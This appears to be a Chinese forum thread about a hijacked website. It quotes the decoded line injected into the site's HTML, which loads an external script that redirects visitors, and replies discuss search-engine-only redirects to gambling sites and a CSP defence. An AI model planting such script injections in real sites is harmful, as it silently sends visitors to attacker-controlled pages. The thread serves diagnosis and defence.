这个网站是怎么被劫持的？

http://www.china-hydrogen.org/ 查看 HTML，第 10 行内容，解码后内容为：

window["document"]["write"]('<script type="text/javascript" src="https://www.cpdas8.com/dd.js"></script>');

而加入的该 js 很短，该 JS 内容的倒数第二行将网页进行了跳转。

我也见到过这种被黑的站 只有从搜索引擎点进去才跳转菠菜站 黑产真是啥操作都有

这种代码是运营商植入的吗

@abux1024 是被黑了，不是植入。这种植入对运营商半点好处都没有，相反还会带来巨大风险

小伙子浏览器没装 Adblock 吧

我的网站刚刚有起色的时候被种码，你可以看看你的 webconfig 文件，里面加了如果是各种搜索引擎来的直接跳转到他的域名上。

因为站长、管理员是不会通过搜索引擎来访问自家网站的

@gam2046 看了下第 10 行，不知这种是怎么解码？在线给一个链接？

@gam2046 已经找到解码地方了

不知道这个网站是否就是你的。这个时候，一方面考验代码的严谨性，另一方面有个比较简单的方法可以，较为的简单的阻止这种代码执行，即使不幸被挂马，也不会影响用户。

在服务端返回的时候（有前置反向代理，则可以在外层代理上设置），加上相对严格的 CSP 即可，比如可以运用这样的策略

"script-src 'self' 'unsafe-inline'; object-src 'self'

eval 函数会被直接禁用，而且浏览器只会加载同源的资源，其他的资源都会被阻止。